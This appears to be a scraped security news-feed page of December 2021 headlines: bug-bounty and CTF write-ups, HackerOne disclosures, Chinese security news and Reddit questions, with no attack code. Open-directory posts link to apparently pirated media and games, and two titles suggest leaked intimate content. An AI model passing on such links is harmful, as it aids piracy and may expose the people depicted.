    whoami Continue reading on Medium »  ( 2 min )
    How I Bypassed Netflix Profile Lock?
    Hi hackers, Continue reading on InfoSec Write-ups »  ( 2 min )
    HOW I GOT MY SECOND SWAG
    Hi everyone! Hope you all are doing good. In this article i am going to show you how i got my second swag from Ivanti by reporting an open… Continue reading on Medium »  ( 2 min )
    DOM Based XSS
    DOM based XSS (cross site scripting) is a client side vulnerability that arises when the javascript takes data from user controllable… Continue reading on Medium »  ( 3 min )
  • Open

    Help with Autopsy on Mac
    Hi, I need to use Autopsy to analyse an E01 image for my project but am struggling to get in set up on my Mac (running Mojave). I downloaded the .zip file from autopsy and have all the files but can't seem to get the GUI running. I installed it via 'brew' but at the end of the install it said error Xcode version too low. So I don't know if it has installed properly. Any help would be appreciated. ​ Thanks submitted by /u/UserNo007 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-27 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    OSINT Research With Recon-ng
    This piece goes over the basics of Recon-ng and how to use it to facilitate OSINT research! I’ll be covering two modules: google_site_web… Continue reading on Medium »  ( 4 min )
    TryHackMe: OhSINT — WriteUp
    Is your information safe enough on internet? Continue reading on Medium »  ( 4 min )
    OSINT Series … Part-1
    What is OSINT ? Continue reading on Medium »  ( 2 min )
  • Open

    FreeBuf早报 | 育碧被曝删除不活跃付费玩家账号;白宫邀厂商商讨加强开源安全
    一位匿名发现其育碧平台的游戏账号被删除,他邮箱曾收到一封警告信,要求他在 30 天内登录账号否则永久删除账号。  ( 1 min )
    多方围剿,老赖现形:一场与反催收黑产的持久战争
    金融行业一场旷日持久的反催收黑产战争,终于行至水深处。  ( 1 min )
    中央网信办发布《“十四五”国家信息化规划》
    《规划》是“十四五”国家规划体系的重要组成部分,是指导“十四五”期间各地区、各部门信息化工作的行动指南。
    工信部、国家标准委联合印发《工业互联网综合标准化体系建设指南(2021版)》
    《建设指南》提出,到2023年,工业互联网标准体系持续完善,制定术语定义、通用需求、供应链/产业链、人才等基础共性标准15项以上。
    广州市国资委监管企业数据安全合规管理指南(试行2021年版)》发布
    《指南》细化完善了上位法要求,成为地方国资监管部门首部针对数据合规专项领域的合规操作指南。
    易盾SaaS系统资损防控体系建设
    业务安全主要是提供认证类的服务,包括验证码,号码日志,信息认证。移动安全是通过加固和其他手段保护客户的应用,防止被逆向破解。  ( 1 min )
    谁动了我的打印机?
    到2021年10月,问题开始变得严重起来,大量安装了10月补丁的Windows 10用户发现他们不能正常的使用网络打印机了。  ( 1 min )
    Token机制相对于Cookie机制的优势
    我们大家在客户端频繁向服务端请求数据时,服务端就会频繁的去数据库查询用户名和密码并进行对比,判断用户名和密码正确与否,并作出相应提示,也就是在这样的背景下Token便应运而生。 简单  ( 1 min )
    Web应用攻击激增,该保护 API 了!
    自2019年10月以来,针对英国企业的Web应用攻击增加了251%。  ( 1 min )
    技术分享 | 常见的DDoS攻击类型及防御措施
    DDoS攻击将呈现高频次、高增长、大流量等特点,对网络安全的威胁也会与日俱增,因此做好DDoS攻击的防护工作已是刻不容缓。  ( 1 min )
    勒索软件或成2022年最大威胁、法国IT服务公司遭勒索攻击|12月27日全球网络安全热点
    安全专家发现了一种通过虚假Google Play商店页面传播的新型银行木马。陌生人假装展示某知名银行的应用程序。  ( 1 min )
    网上的“考勤打卡神器”,其实是黑灰产作弊工具
    网上的“考勤打卡神器”虽然能够解决部分从业者打卡的“烦恼”,但这是一种虚假考勤行为,是一种职场失信。
    专家详述 macOS 漏洞 :可让恶意软件绕过安全门卫
    问题的根源在于基于脚本的未签名、未公证的应用程序,无法明确指定解释器,从而导致其完美绕过。  ( 1 min )
    使用量增长了 46%,更加注重隐私的搜索引擎DuckDuckGo发展迅速
    以隐私为重点的搜索引擎 DuckDuckGo在2021年继续快速增长,目前平均每天有超过 1 亿次的搜索查询。  ( 1 min )
    从网络安全到云服务,天融信以安全助力云计算产业发展
    天融信以融合思维自研云产品,用安全助力云计算产业发展。
    搜索引擎你真的会用吗?学会这几个高级语法让你事半功倍
    本文介绍了几个常用的搜索引擎高级语法,熟练掌握将助你信息检索事半功倍,效率大大提高。  ( 1 min )
    Gartner 发布2022年新兴技术和趋势影响力雷达图中五项具有影响力的技术
    今年的新兴技术和趋势影响力雷达图包含23项最有可能给市场带来变革和转型的新兴趋势和技术。
    从零到一带你深入 log4j2 Jndi RCE CVE-2021-44228漏洞
    通过介绍ava日志体系,分析log4j2源码,带你深入本次互联网重磅“核弹”漏洞。  ( 2 min )
  • Open

    How Intrusion Prevention Systems (IPS) Work in Firewall
    Intrusion prevention and the firewall are part of Network Threat Protection. As of version 14, Network Threat Protection and Memory…  ( 5 min )
    Backdoor: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add backdoor.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
  • Open

    How Intrusion Prevention Systems (IPS) Work in Firewall
    Intrusion prevention and the firewall are part of Network Threat Protection. As of version 14, Network Threat Protection and Memory…  ( 5 min )
    Backdoor: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add backdoor.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
  • Open

    Untitled
    VK.com disclosed a bug submitted by azimoff: https://hackerone.com/reports/1300583 - Bounty: $300
    Bot setting information leakage in OpenChat room
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1305432 - Bounty: $200
    Access to images and videos in drafts on LINE BLOG
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1290170 - Bounty: $780
    Missing authentication in buddy group API of LINE TIMELINE
    LINE disclosed a bug submitted by e26174222: https://hackerone.com/reports/1283938 - Bounty: $3000
    See drafts and post articles if the account owner hasn't set password (livedoor CMS plugin)
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1278881 - Bounty: $1300
    Missing ownership check in 2FA for secondary client login
    LINE disclosed a bug submitted by shi0n: https://hackerone.com/reports/1250474 - Bounty: $7500
    Developer uploaded files missing authentication on LINE GAME Developers site(gdc.game.line.me)
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/969605 - Bounty: $1000
    Password reset by malicious input on air.line.me
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/968742 - Bounty: $500
    LINE Profile ID leaks in OpenChat
    LINE disclosed a bug submitted by 66ed3gs: https://hackerone.com/reports/927338 - Bounty: $3000

  • Open

    Various stuff - mostly photos
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    Music
    submitted by /u/International_Milk_1 [link] [comments]
    A nice list of movies, and older tv series such as Mannix
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    1.19TB of documentaries, many with subtitles (repost from January 2019)
    submitted by /u/Throw10111021 [link] [comments]  ( 1 min )
    "Poetry for the Beat Generation" plus some jazz albums (flac)
    Finally found "Poetry for the Beat Generation" with Allen on piano and Kerouac reciting http://109.120.203.163/Music/Acid%20jazz/ submitted by /u/SexRevolutionnow [link] [comments]
    Music which was pasted before, but at different link
    submitted by /u/International_Milk_1 [link] [comments]
    Movies and tv shows. But it's a mixture of those which are dubbed in persian/iranian with no english audio option, and those with english language soundtrack and persian/iranian subs. But subs can be turned off. Speed is so so I guess.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    XPSF VLC Playlist of movies I found here
    Please delete if not allowed Hi guys, awhile ago I made a quick and easy browser tool to convert links into a VLC Playlist, you might be wondering why I opted out of M3U playlists, honestly for future expansion, m3u playlists tend to be pretty simple on the SPEC, can't define much, while XPSF allows for things like duration setting. It is a goal to rewrite this eventually and figure out a way of showing the duration, probably using an API of some kind. (my tool: https://csmit195.github.io/Links-to-XSPF-Web-App/) I have two files, one is 14.1k movies, and the other is 4.1k movies. My PC is fairly fast and loading the 14.1k movies took about 3mins, while the 4.1k only takes 10secs. Please test carefully with the 14.1k, some PC's might fail to load it, vlc could crash b4 finish loading. Downloads: note: the top 1.1k movies of both files are more popular than the ones below it 14.1K Movies (4.1K Movies from below included) https://drive.google.com/file/d/1gSjguuPTTyP_2oVktKD_YqbaAZStpEu4/view?usp=sharing 4.1K Movies https://drive.google.com/file/d/1dSb3d_CDbsvR7UO8nnnDBdYmJmsuBPv2/view?usp=sharing If you want more or have a really good source of direct movie links, feel free to lmk and I'll create more playlists. For now, enjoy and would love feedback (please no code reviews, I made it quickly so I can achieve this goal, wasn't really built for production, I'd love to optimise it in the future tho. Cheers, Chris submitted by /u/csmit195 [link] [comments]  ( 2 min )
  • Open

    A capability-safe language would have minimized the Log4j vulnerability
    Article URL: https://justinpombrio.net/2021/12/26/preventing-log4j-with-capabilities.html Comments URL: https://news.ycombinator.com/item?id=29696318 Points: 94 # Comments: 142  ( 6 min )
  • Open

    Abeats Bounty Program
    Aiming to test the website's usability, the bounty program is ideal for gathering engagement from the community and finding the necessary… Continue reading on Medium »  ( 1 min )
    CVE-2021–40579
    Insecure direct object references (IDOR) Continue reading on Medium »  ( 1 min )
    Passive Information Gathering for Pentesting
    Information gathering very important for pentester. Continue reading on Medium »  ( 2 min )
  • Open

    How do I start with Netsec ?
    I am currently enrolled in a computer science degree and, asked myself what I want to do with it. I often found myself at one filed, Security. However I have no clue on how or where to start learning more about the field. For example I find pentesting especially interesting and searched for ways to get into the field. I found two ideolegies for that, one being hands on experience and the other being strong basics. However that only gave me more questions. First: what is "Hands-on experience" ? Do I have to hack my own laptop or crack my neighbors Wifi password? Or is it much simpler to get experience? Second: Basics of what? How a computer works? The different protocols of the internet? And also, how do I get strong basics ? Where do I even start? submitted by /u/CallMeNepNep [link] [comments]  ( 2 min )
  • Open

    SecWiki News 2021-12-26 Review
    gosint开源 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Cracked5pider/KaynLdr: KaynLdr is a Reflective Loader written in C/ASM
    submitted by /u/dmchell [link] [comments]
  • Open

    FreeBuf早报 | 部分App禁止全部权限仍可获取用户信息;《蜘蛛侠》盗版资源内含恶意程序
    《蜘蛛侠:英雄无归》的一些盗版资源包含挂马或者捆绑恶意软件,甚至还有夹杂挖矿程序。  ( 1 min )
  • Open

    Advent of Cyber 3 Day 16 - Ransomware Madness Walkthrough
    You are the responding intelligence officer on the hunt for more information about the infamous “Grinch Enterprises” ransomware gang.  As… Continue reading on Medium »  ( 2 min )
    Log4Shell — You should know about it.
    Hello everyone! Continue reading on Medium »
  • Open

    What is a Watering Hole Attacks and How to Prevent Them
    submitted by /u/bee925p [link] [comments]  ( 1 min )
  • Open

    CTF Write-Up: Ether
    CTF challenge available at ctf-mystiko.com. Continue reading on Medium »  ( 1 min )
  • Open

    CTF Write-Up: Ether
    CTF challenge available at ctf-mystiko.com. Continue reading on Medium »  ( 1 min )
  • Open

    Weaponize JScript to bypass Windows Defender
    To gain initial access during a Red Team Engagement, Phishing might be a valid option. Continue reading on Medium »  ( 3 min )
  • Open

    Accessing data in suspect disk
    After copying with write block how to investigators access data in an encrypted drive? Do they have to break the encryption password with powerful servers? or are there other methods? submitted by /u/thecirclingfly [link] [comments]  ( 2 min )

  • Open

    Join Synack Red Team
    Hi, how to join synack after finishing HTB track submitted by /u/0xA1MN [link] [comments]
    Stay organized with your pentesting knowledge
    Hi, I am not a professional, I just love pentesting/CTF stuff and I discover new things every day, thanks to HackTheBox, TtyHackMe and other platforms. I would like to collect all my knowledge online, let's say a webpage with methodology step-by-step: information gathering scanning search for vulnerabilities and so on.. I would like to put "cheatsheet" for useful commands like nmap, dirbuster, sqlmap .. I tried a simple blog with Wordpress, but I wondering if you use something better (github)? Thankyou. submitted by /u/g-simon [link] [comments]  ( 2 min )
    Firewall+IPS hardware recommendations for a home LAN setup
    Hi All, i'm planning to play around with some firewall distros that have IPS/Suricata enabled. Target environment is for a SOHO with around 10 people, not hosting any web servers or whatnot. Any hardware recommendations, particularly on the CPU and RAM? Is a Pentium Gold G6400(2 cores, 4 threads) and 4GB RAM good enough? i read somewhere that CPU(# of cores) carries more weight than RAM, IPS-wise. Would it make sense to use AMD processors instead? Wouldn't the GPU cores just go to waste on a firewall/IPS? tia submitted by /u/albertcuy [link] [comments]  ( 1 min )
    How secure is it to stay logged into a sife?
    Say you stay logged into an email or social media site, is there any risk in doing so? submitted by /u/RaZdoT [link] [comments]  ( 1 min )
    How secure is Netgear RAX45 VPN with Remote Desktop?
    I turned on VPN in router settings, which uses OpenVPN, and successfully set up a Remote Desktop, using OpenVPN Client and Remote Desktop for windows 10. Wanted to ask: - how secure is this setup? - is there a better way to have a cheap and personal/small business secure Remote Desktop with VPN? submitted by /u/WiseMan9000 [link] [comments]  ( 1 min )
  • Open

    Smallish list of older movies. Nothing after 1972. Some good stuff here.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Animation with audio options for english or farsi, according to the few I checked; *slow, though)
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    从了解洞态IAST到加入开源社区
    作为公司信息安全部的成员,确保每一条业务线的应用安全,是我工作的一部份,那么如何完全这项使命呢?  ( 1 min )
    从0到1编写一个Xposed Module :Anti Screenshot
    菜鸡的截图之路  ( 1 min )
    Abaddon:专为红队研究人员设计的增强工具
    Abaddon旨在帮助红队研究人员提升运营效率,并通过更高的速度和更隐蔽的方式执行某些重复操作。  ( 1 min )
  • Open

    HOW I Found 17 Critical and Medium Security Bug on INDUSIND Bank
    Hi, everyone Continue reading on Medium »  ( 3 min )
    How I got access Maxlifeinsurance insurance company AWS metadata access by SSRF
    Hi, everyone Continue reading on Medium »  ( 3 min )
    Jerry From Hackthebox
    Hello everyone I am HAC and Today we will be doing jerry from Hackthebox Continue reading on Medium »  ( 2 min )
    Massive Users Account Takeovers(Chaining Vulnerabilities to IDOR)
    Hello hunters 👋✌ this is my 7th writeup 🧾, Continue reading on Medium »  ( 2 min )
    SQL Injection — 1st Dose
    An Injection that is not used for treatment! Continue reading on Medium »  ( 2 min )
    Information Disclosure leads to sensitive credential($$$)
    Hi Hackers, hope you are fine.my name is khan mamun(white hat hacker) This is my 3rd write up. Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2021-12-25 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    I found (and fixed) a vulnerability in Python
    Article URL: https://tldr.engineering/how-i-found-and-fixed-a-vulnerability-in-python/ Comments URL: https://news.ycombinator.com/item?id=29683853 Points: 3 # Comments: 0  ( 2 min )
  • Open

    Router Management Practices: Web, App, and forcing to associate user home network with a vendor account
    submitted by /u/wkwrd [link] [comments]
    Make Your Pc Notify Your Phone Whenever There is Movement Around it
    submitted by /u/MagicianPutrid5245 [link] [comments]  ( 1 min )
  • Open

    Empire: LupinOne Vulnhub Walkthrough
    Empire: LupinOne is a Vulnhub easy-medium machine designed by icex64 and Empire Cybersecurity. This lab is appropriate for seasoned CTF players who want to put The post Empire: LupinOne Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    CaseVegas Walkthrough — Cyberdefenders
    Challenge: CaseVegas Continue reading on Medium »  ( 7 min )
  • Open

    Forensic Courses
    Took the video lectures from EC Council CHFI. But it did not teach me how to use tools or real world data just the theory. Can you suggest a course/resource/links that teach you how to use forensic tools with real world scenarios. submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    A bit of amateur detective work
    Hi all, I am looking at some student submissions of word 2010 docs. I suspect the time stamp has been changed in some way. Is there a way to verify it beyond just looking at the word doc's property? submitted by /u/HelloAmes [link] [comments]  ( 2 min )

  • Open

    I set up MAC address filtering but there are still unrecognized devices on my network. Is this normal?
    I recently set up MAC address filtering (white-list/allow-list) to only allow certain devices to connect to my network. However, when I check connected devices, I still see two devices that I don't recognize and they are not in my allow-list. How are they connecting to the network? I tested the MAC address filtering with my phone temporarily removing it from the list, and the filter worked. So I am confused why those two devices are not blocked. For what it's worth, both devices are showing as "Espressif Inc" and are probably part of my smart devices, so I am not too concerned about them. However, I would still like to understand why they are not being blocked by the filter. submitted by /u/ultrakawaii [link] [comments]  ( 1 min )
    identifies SSL/TLS depencies
    Hello, It may look like a noob question but, It's my first job and... We have servers on which weak SSL/TLS versions are running. So,I have spoken with servers owners, check on which port their usage has been detecte, At the end of the investigation, I had determined that it was ok if I disabled TLS 1.0 and 1.1. But this was a mistake and one of our importante application couldn't communicate anymore with our SQL server. In the panic I reversed all of my changes. And now I'm afraid of trying to patch this issues. So was the best way to detect the usage of SSL/TLS. Should I sniff every servers with wireshark or something else? Thanks you all submitted by /u/Low_Lettuce_8933 [link] [comments]  ( 2 min )
    How to view the exploit code of metasploit's auxiliary or exploits?
    I've been trying to get shell into a exploit of SMB but I think it uses somewhat of buffer overflows scheme. Any way to see the exploit [code] behind metasploit exploits? Here's the exploit I've been trying to use: exploit/windows/smb/ms17_010_eternalblue submitted by /u/The_Intellectualist [link] [comments]  ( 1 min )
  • Open

    Thread in lunar clinet?? java.trojan.genericgba.30921
    Hello, I recently did an analysis with bitdefender and I detected this thread: java.trojan.genericgba.30921 but I looked for this name on the internet but nothing came out, the strange thing is that the thread was detected in a Lunar Client folder (A minecraft client) and also in a minecraft mod (Geyser) this seems very strange to me because according to the lunar client and geyser mod it is safe, does someone here have an answer to why it is detected as a thread? submitted by /u/QuirkyCod4995 [link] [comments]  ( 1 min )
    About work fields (investigation, private market etc).
    I'm 18 and I'm from Brazil. I'm currently studying Computer Science. Some things lead me to become interested in computer forensincs these past months, and I'm interested on following this career. Since here in Brazil you first need a CS degree to do a computer forensics course, I'm focused on finishing my CS course first for now. I looked at the FAQ here and got a lot of useful information, but I still have one that wasn't answered: what are the fields you can work? I know you can work in law enforcement and do forensics analysis to find digital evidence of a suspect (wich is most cases I belive), but can you work on the investigation field (like tracing criminals online)? If not, how do I work on this investigation field related to crimes online? Is computer forensics the best thing to study in this case? Another question is: on the private work field, how does it work? Do you work with data recovery stuff? I hope I don't annoy you with those questions, but I couldn't find them here yet! submitted by /u/silva-txt [link] [comments]  ( 1 min )
    Timeline
    hi, is there a way in excel or other software to put a list of phonecalls, their dates and time and get a timeline that show how many calls were made to the same phone or to the same phone by date and time. Thanks in advance. submitted by /u/joshmaidom [link] [comments]  ( 1 min )
    ?? After seizing an Android 10, should keep charging battery ??
    📷 There may be weeks before digital forensic people come to examine the Android 10 phone with unknown passcode. It was in use when seized, but later auto locked. Pls Help: (1) Should keep it in power on and keep charging it? since battery cannot last long enough for weeks. (2) Would it be harder to unlock or retrieve data if let it power down and then switch on later? submitted by /u/Just_Drama5668 [link] [comments]  ( 2 min )
  • Open

    Joni MItchell albums
    submitted by /u/International_Milk_1 [link] [comments]
    Clifford D Simak reading City
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Hmm. Some music, but other types of audio (see comment)
    submitted by /u/International_Milk_1 [link] [comments]
    Tons of pirated video games
    Hi i use this website for repacks ddl http://s5.gamingmaster.ir it has a home page too http://gamingmaster.ir ​ archives password: gamingmaster.ir submitted by /u/develhoper [link] [comments]  ( 1 min )
    movies, korean tv dramas, tv series, etc etc (some txts in english, some in korean-same with content-no english subs for korean dramas)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    movies, tv shows, music, manga, etc etc (slow speeds)
    submitted by /u/International_Milk_1 [link] [comments]
    music for ringtones
    submitted by /u/International_Milk_1 [link] [comments]
    one very small music list (at least in open directory format-see below) , and 1 very small movie list, with slow speeds.
    THe movie one Index of / The Music one Index of /Directos/ (ladiscoteca.net) If you go to parent directory, there is a lot more stuff divided into years, genres etc etc. There is a radio player if you stroll down, Maybe someone else can do a better job of explaining it than me. Although it is not in open directory format. So if you just want to stream, it's good. I think the sound is great though. The one hit wonders is a nice one. submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Anything you want here is for free
    Download limit exceeded for Main drive now 😔 limit resets at 2021-12-25 at 00:00:00 UTC. https://premiuim.rahuljayant.workers.dev/0:/ Edit - You can search from the hamburger menu - For username and password for 18+ from Drop down menu DM , otherwise post will be labelled as NSFW. submitted by /u/rahuljayant1 [link] [comments]  ( 2 min )
    Documentation for classic computers
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    documentary type shows
    https://archive.org/download/pbsnovadocs https://davfl70.org/~davflsev/movies/WWI/ https://ir2.papionvod.ir/Media/Series/Terra%20Nova/Season%201/ http://flixhub.net/Data/Disk3/English%20Tv%20Serise/Planet%20Earth/Season%2001/ https://archive.org/download/Cops-Seasons-1-33-Cops-Reloaded https://archive.org/download/DocuCollection_201702 https://archive.org/download/InsideTheAmericanMobS01E06EndGame 2nd and 3rd links have a ton in their parent directories and 4th is from the most recent post here, sorry for that repost but i figured it id save someone the time of scrounging thru submitted by /u/ohimjustakid [link] [comments]  ( 1 min )
    science fiction and fantasy folk music (small slection)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    movies
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    How to exploit Log4j vulnerabilities in VMWare…
    submitted by /u/digicat [link] [comments]  ( 1 min )
  • Open

    Hunting down spider-man using Sherlock
    Ever wondered how to get the social media links of your favorite marvel superheroes or as a matter anyone’s else online social presence? Continue reading on Medium »  ( 1 min )
    Your Stalker Wants Your Outlet
    As crazy as it may sound, your stalker is looking for any possible clue in your photos to get a general idea of where you’re located and… Continue reading on Medium »  ( 1 min )
  • Open

    Micropatching “Ms-Officecmd” Remote Code Execution (No CVE)
    Article URL: https://blog.0patch.com/2021/12/micropatching-ms-officecmd-remote-code.html Comments URL: https://news.ycombinator.com/item?id=29674988 Points: 3 # Comments: 0  ( 5 min )
    Where's the Interpreter? (CVE-2021-30853)
    Article URL: https://objective-see.com/blog/blog_0x6A.html Comments URL: https://news.ycombinator.com/item?id=29669026 Points: 3 # Comments: 0  ( 28 min )
  • Open

    Free public Docker image vulnerability DB
    Article URL: https://dso.atomist.com/explore Comments URL: https://news.ycombinator.com/item?id=29674898 Points: 2 # Comments: 0
    ShortList: Log4j Vulnerability Tools
    Article URL: https://haydenjames.io/log4j-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29673107 Points: 1 # Comments: 0  ( 4 min )
    Alberta MLA resigns after RCMP searches home after vulnerability report`
    Article URL: https://www.cbc.ca/news/canada/edmonton/alberta-mla-thomas-dang-resigns-from-ndp-caucus-after-rcmp-searches-home-1.6294219 Comments URL: https://news.ycombinator.com/item?id=29670252 Points: 9 # Comments: 0  ( 2 min )
  • Open

    SecWiki News 2021-12-24 Review
    利用CodeQL分析并挖掘Log4j漏洞 by ourren vulntarget漏洞靶场系列(二)— vulntarget-b by ourren 更多最新文章,请访问SecWiki
  • Open

    Full Path Disclosure in Wordpress Rest API Response
    Showmax disclosed a bug submitted by fariqfgi: https://hackerone.com/reports/1358888 - Bounty: $50
    Xss At Shopify Email App
    Shopify disclosed a bug submitted by shaktiranjan867: https://hackerone.com/reports/1339356 - Bounty: $500
    Reflected XSS on dailydeals.mtn.co.za
    MTN Group disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1212235
    Reflected XSS at dailydeals.mtn.co.za
    MTN Group disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1210921
  • Open

    Vibranium Debug Campaign
    Vibranium is pleased to announce the debug bounty campaign! Continue reading on Medium »  ( 2 min )
    Getting access to the Database of a Crypto Exchange using Google Dorks!
    Hello, Continue reading on Medium »  ( 2 min )
    Crema Bug Bounty Program Winners Announcement
    Continue reading on Medium »  ( 1 min )
    Install Nuclei on Kali Linux [Latest using go1.17]
    Nuclei : Vulnerability Scanner. Continue reading on Medium »  ( 1 min )
    Exposing Millions of Investor and Startup Register details and PII INFO in STARTUPINDIA (Govt of…
    Hi, everyone Continue reading on Medium »  ( 5 min )
  • Open

    Cloud Security Breaches and Vulnerabilities: 2021 in Review
    submitted by /u/thorn42 [link] [comments]
    Blister malware can breach your devices in absolute stealth
    submitted by /u/IT_band [link] [comments]  ( 1 min )
    Log4PowerShell - A CVE-2021-44228 Proof of Concept / Demo I wrote in PowerShell
    submitted by /u/aalex954 [link] [comments]
  • Open

    2022年及以后的五项网络安全预测
    目前,网络安全业内领导者面临了众多挑战,并且未来几年依旧会持续增多。  ( 1 min )
    CVE-2021-31956 漏洞分析
    总体来说难度不大,非常适合初学者入门。  ( 1 min )
    FreeBuf甲方群讨论 | 企业安全的价值到底该如何度量?
    有人比喻到,安全就是桥两边的护栏,不出事谁也感受不到它的价值,没有又觉得不踏实。
    IoT SAFE ——强化物联网生态系统的安全性
    隧道的尽头是光。  ( 1 min )
    明年见 | CIS 2021春日版议题预告直播圆满成功
    这个圣诞,我不愿让你一个人因为有FreeBuf公开课陪伴着你~12月21日-12月23日每晚19点,FreeBuf公开课邀请大会各论坛嘉宾直播提前剧透议题,携手13位技术专家在直播间内与大家共话网络安全新技术、新趋势。足不出户,提前掌握各分论坛的干货内容,与行业大咖近距离交流,这个圣诞不再让你孤单~在这3天的直播里,来自各行各业的嘉宾给最为广泛的网络安全一线工作者中的代表者和佼佼者们带来了丰富的内  ( 1 min )
    windows ALPC内核拦截的方法
    ALPC这个只是一个标准协议,每个不同的服务比如 创建服务与创建账号与搜索系统信息等的具体内容都是不同的,要自己手动解码。  ( 2 min )
    什么是CDN?CDN的工作原理是怎样的?
    CDN是构建在网络之上的内容分发网络,依靠部署在各地的边缘服务器。
    基于漏洞优先级,构建关基漏洞主动管理体系 | 世界信息安全大会
    浅谈关基建漏洞主动防御体系建设。  ( 1 min )
    《工业和信息化领域数据安全风险信息报送与共享工作指引(试行)(征求意见稿)》发布
    《工作指引》指出,风险信息报送,是指有关单位向工业和信息化部、地方工业和信息化主管部门、地方通信管理局报送数据安全风险信息的行为。
    Web渗透测试中我们该收集什么信息?
    知己知彼,百战不殆。一文看懂如何在渗透测试前期最大化收集信息。  ( 1 min )
    因为诈骗太多,“俄罗斯微信”VK强制上线双因素认证
    VK终于开始引入双因素身份认证,并计划在 2022 年 2 月强制要求大型社区的管理员使用。  ( 1 min )
    研究显示,圣诞期间的的撞库攻击将激增
    研究分析称,去年圣诞节和新年购物期间的撞库事件增加了 56%,预计 2021 年同期每天将有多达 800 万次针对消费者的攻击。  ( 1 min )
    逆向分析教程(二)——大本营
    逆向分析教程(一)——调试代码 新增调试命令我想大家根据上文实操已经掌握了提到的基本指令,我们再来复习下,F7,F8,ctrl+F2,ctrl+F9,如果感觉陌生建议回炉重造。因为今天我们又要开始了解  ( 1 min )
    FreeBuf周报 | Gumtree 分类网站泄露客户信息;Hive 勒索软件正大肆发起网络攻击
    我们总结推荐本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!  ( 1 min )
    大型流量数据计算分析平台的构建与行业实践 | CIS 2021·Spring春日版大会议题初探
    基于流量的大型数据分析平台建设,能为企业提供更加动态、精准的营销建议,并从安全上为数据保驾护航。  ( 1 min )
    英伟达(NVIDIA)披露了受 Log4j 漏洞影响的应用程序
    Log4Shell漏洞,正在全球范围内被大量攻击利用。  ( 1 min )
  • Open

    [project]Bypass Firewalls using Various Evasion Techniques
    Bypass windows firewall using Nmap evasion techniques Continue reading on Medium »  ( 2 min )
  • Open

    SQL Injection JR. Pentester -TryHackMe Part 2
    Hi folks, welcome back to part 2 of SQL injection in JR. Pentester path.  ( 3 min )
    Identity Management Vulnerability Taxonomy v1.5
    I really like the OWASP list of vulnerabilities because it mostly stays in an uniform level of abstraction. Some issues are fairly… Continue reading on InfoSec Write-ups »  ( 4 min )
  • Open

    SQL Injection JR. Pentester -TryHackMe Part 2
    Hi folks, welcome back to part 2 of SQL injection in JR. Pentester path.  ( 3 min )
    Identity Management Vulnerability Taxonomy v1.5
    I really like the OWASP list of vulnerabilities because it mostly stays in an uniform level of abstraction. Some issues are fairly… Continue reading on InfoSec Write-ups »  ( 4 min )

  • Open

    Tg pinay
    submitted by /u/kotsu0401 [link] [comments]
    TG pinay leaked
    submitted by /u/kotsu0401 [link] [comments]
    APK for music, movies etc etc
    submitted by /u/International_Milk_1 [link] [comments]
    Index of /library/
    Lots of pdf:es in all kind of subjects. http://erewhon.superkuh.com/library/ submitted by /u/CourseCalm [link] [comments]
    Several albums of deep-sea robot dives from Columbia University's climate school
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Writing/Poetry Anthology Drafts
    submitted by /u/VeinyNotebook [link] [comments]
  • Open

    My smart TV has some sketchy ports open. Any clues?
    I captured some persistent host discovery traffic on my home WiFi network with Wireshark. There's a never-ending activity in UDP and SSDP coming from this device. A basic nmap scan shows the following: Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-23 18:37 -03 Initiating ARP Ping Scan at 18:37 Scanning 192.168.1.11 [1 port] Completed ARP Ping Scan at 18:37, 0.13s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 18:37 Completed Parallel DNS resolution of 1 host. at 18:37, 0.01s elapsed Initiating SYN Stealth Scan at 18:37 Scanning 192.168.1.11 [1000 ports] Discovered open port 8080/tcp on 192.168.1.11 Discovered open port 9001/tcp on 192.168.1.11 Discovered open port 9080/tcp on 192.168.1.11 Discovered open port 8002/tcp on 192.168.1.11 Discovered open port 8001/tcp on 192.168.1.11 Discovered open port 9000/tcp on 192.168.1.11 Completed SYN Stealth Scan at 18:37, 0.23s elapsed (1000 total ports) Nmap scan report for 192.168.1.11 Host is up, received arp-response (0.0058s latency). Scanned at 2021-12-23 18:37:29 -03 for 0s Not shown: 994 closed ports Reason: 994 resets PORT STATE SERVICE REASON 8001/tcp open vcom-tunnel syn-ack ttl 64 8002/tcp open teradataordbms syn-ack ttl 64 8080/tcp open http-proxy syn-ack ttl 64 9000/tcp open cslistener syn-ack ttl 64 9001/tcp open tor-orport syn-ack ttl 64 9080/tcp open glrpc syn-ack ttl 64 MAC Address: 8C:EA:48:XX:XX:XX (Unknown) Read data files from: 